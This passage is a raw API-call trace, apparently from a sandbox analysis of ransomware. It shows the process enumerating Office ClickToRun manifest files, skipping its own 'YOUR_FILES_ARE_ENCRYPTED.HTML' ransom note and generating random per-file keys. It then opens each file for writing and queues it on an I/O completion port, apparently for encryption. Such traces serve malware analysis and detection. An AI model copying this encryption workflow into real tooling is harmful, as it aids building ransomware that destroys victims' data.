cAlternateFileName="C233DB~1.XML")) returned 1 [0105.360] StrStrIW (lpFirst="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.360] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned 129 [0105.360] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned=".xml" [0105.360] lstrlenW (lpString=".xml") returned 4 [0105.360] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned=".xml" [0105.360] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.360] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0105.361] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=36614) returned 1 [0105.362] GetProcessHeap () returned 0x600000 [0105.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0105.365] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="91") returned 2 [0105.365] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="A6") returned 2 [0105.365] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="60") returned 2 [0105.365] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C1") returned 2 [0105.365] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="BA") returned 2 [0105.365] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="58") returned 2 [0105.365] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="54") returned 2 [0105.365] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="42") returned 2 [0105.365] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="96") returned 2 [0105.365] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="52") returned 2 [0105.365] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="0F") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A2") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="6C") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="66") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="C3") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="16") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="79") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="B6") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="86") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="77") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="A2") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="BC") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="88") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="69") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="28") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="25") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="BA") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="AE") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="E9") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="91") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="B5") returned 2 [0105.366] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="5A") returned 2 [0105.367] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" [0105.367] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.367] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0105.367] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6553a708, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x17f6, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.groovemui.msi.16.en-us.xml", cAlternateFileName="C26024~1.XML")) returned 1 [0105.367] StrStrIW (lpFirst="C2RManifest.groovemui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.367] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned 117 [0105.367] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml") returned=".xml" [0105.367] lstrlenW (lpString=".xml") returned 4 [0105.367] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml") returned=".xml" [0105.368] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.368] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.369] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=6134) returned 1 [0105.369] GetProcessHeap () returned 0x600000 [0105.369] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0105.372] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="69") returned 2 [0105.372] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="89") returned 2 [0105.372] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="21") returned 2 [0105.372] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="2D") returned 2 [0105.372] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="CC") returned 2 [0105.373] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="CA") returned 2 [0105.373] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="CF") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="94") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="0F") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="04") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="32") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="BC") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="D8") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="4F") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="46") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="75") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="1C") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="C6") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="37") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="BB") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="1D") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="C2") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="97") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="FD") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="8E") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="F1") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="CB") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="74") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="50") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="CE") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="AF") returned 2 [0105.373] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="58") returned 2 [0105.374] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" [0105.374] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.374] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0105.374] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830652d4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x830652d4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64441c43, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x15dd6, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cAlternateFileName="C25956~1.XML")) returned 1 [0105.374] StrStrIW (lpFirst="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.374] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned 125 [0105.374] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned=".xml" [0105.374] lstrlenW (lpString=".xml") returned 4 [0105.375] PathFindExtensionW (pszPath="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned=".xml" [0105.375] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.392] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=89558) returned 1 [0105.392] GetProcessHeap () returned 0x600000 [0105.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0105.424] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="16") returned 2 [0105.424] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="F4") returned 2 [0105.424] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="E3") returned 2 [0105.424] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="81") returned 2 [0105.424] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E4") returned 2 [0105.424] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="8D") returned 2 [0105.424] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="01") returned 2 [0105.424] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="62") returned 2 [0105.424] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="EE") returned 2 [0105.424] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="67") returned 2 [0105.424] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="46") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="1A") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="53") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="65") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="EB") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="AC") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="25") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="71") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="48") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="C9") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="DD") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="B3") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="0E") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="E6") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="40") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="C0") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="B7") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="F8") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="23") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="85") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="49") returned 2 [0105.425] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="14") returned 2 [0105.426] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" [0105.426] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.426] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0105.426] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8303f160, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x8303f160, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6556f8c0, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x5b20, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml", cAlternateFileName="C2FCD6~1.XML")) returned 1 [0105.426] StrStrIW (lpFirst="C2RManifest.lyncmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.426] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned 115 [0105.426] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml") returned=".xml" [0105.426] lstrlenW (lpString=".xml") returned 4 [0105.426] PathFindExtensionW (pszPath="C2RManifest.lyncmui.msi.16.en-us.xml") returned=".xml" [0105.426] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.lyncmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.427] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=23328) returned 1 [0105.427] GetProcessHeap () returned 0x600000 [0105.427] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.430] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="6C") returned 2 [0105.430] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="9C") returned 2 [0105.430] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="72") returned 2 [0105.430] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="A2") returned 2 [0105.430] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="64") returned 2 [0105.430] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="DF") returned 2 [0105.430] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="E4") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="23") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="51") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="FF") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="8B") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="D4") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="5D") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C6") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="9B") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="21") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="5D") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="C7") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="11") returned 2 [0105.430] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="02") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="9D") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="34") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="33") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="45") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="2F") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="6C") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="23") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="3C") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="29") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="43") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="08") returned 2 [0105.431] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="6B") returned 2 [0105.432] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml" [0105.432] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.432] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0105.432] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fcc6db, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82fcc6db, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x656085a0, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x55c2, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.office64mui.msi.16.en-us.xml", cAlternateFileName="C26643~1.XML")) returned 1 [0105.432] StrStrIW (lpFirst="C2RManifest.office64mui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.432] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml") returned 119 [0105.432] PathFindExtensionW (pszPath="C2RManifest.office64mui.msi.16.en-us.xml") returned=".xml" [0105.432] lstrlenW (lpString=".xml") returned 4 [0105.434] PathFindExtensionW (pszPath="C2RManifest.office64mui.msi.16.en-us.xml") returned=".xml" [0105.434] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.434] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.office64mui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.444] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=21954) returned 1 [0105.444] GetProcessHeap () returned 0x600000 [0105.444] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0105.448] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="48") returned 2 [0105.448] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="12") returned 2 [0105.448] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F0") returned 2 [0105.448] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="47") returned 2 [0105.448] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="BE") returned 2 [0105.448] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="11") returned 2 [0105.448] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="61") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="91") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="1F") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="AB") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="81") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="37") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="A4") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="DF") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="6A") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="32") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="BF") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="0A") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="C2") returned 2 [0105.448] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: 